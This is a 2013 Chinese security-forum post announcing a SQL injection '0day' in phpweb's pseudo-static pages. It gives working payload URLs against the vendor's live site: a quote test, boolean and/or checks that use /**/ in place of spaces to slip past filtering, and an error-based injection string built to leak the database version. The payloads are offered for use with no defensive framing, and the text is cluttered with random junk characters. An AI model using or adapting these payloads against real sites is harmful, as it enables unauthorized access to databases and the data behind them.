找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2305|回复: 0
打印 上一主题 下一主题

phpweb伪静态页面注入0day

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-4 19:46:42 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
phpweb所有的整站程序伪静态页面都存在sql注入
! [, I4 m: z) h( I* w2 N! C9 P- c
- R: \$ j7 @9 j3 X( F主站:http://phpweb.net/
5 y9 [7 P) E, S* F" E/ ~1 H/ z; B加’检测:" ]3 o6 v) q1 c; Z! d

0 M- f/ M5 R& \http://www.phpweb.net/down/html/?772′.html# r9 ~" i+ j0 W, B% t7 e
  k& r1 |% g0 B7 c( T7 d; |
出错' |1 e, ~/ T! C1 a( b  j( D
存在注入。
: A- f( t0 D9 [2 p9 P2 i8 W不能用空格,只能用/*罗4 D2 j5 H" O9 \& A- Z9 Q* H
http://www.phpweb.net/page/html/?56′/**/and/**/1=1/*.html 正常
) [, C+ }- h3 e7 s4 R. Q/ \9 q! J
; z0 F' `$ }- z' xhttp://www.phpweb.net/page/html/?56′/**/and/**/1=2/*.html 出错.0 Q* R: ~6 S7 I& Z8 i$ }" m) j# E
爆数据库版本:
( E9 z. V4 J& Z3 B' e3 u  t 7 b) [. ^+ i6 r0 T0 C
?0 A! `7 l" b% g* T2 t0 B5 I
1
) W; l3 }% Q8 H+ k) M) qhttp://www.phpweb.net/page/html/?56'/**/and/**/(SELECT/**/1/**/from/**/(select/**/count(*),concat(floor(rand(0)*2),(substring((select(version())),1,62)))a/**/from/**/information_schema.tables/**/group/**/by/**/a)b)=1/*.html9 ]/ E! {7 U) n( |) ~( T3 L
更新日期: 2013-01-03 13:39:50        2 W" O1 `7 T: x# d' m
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表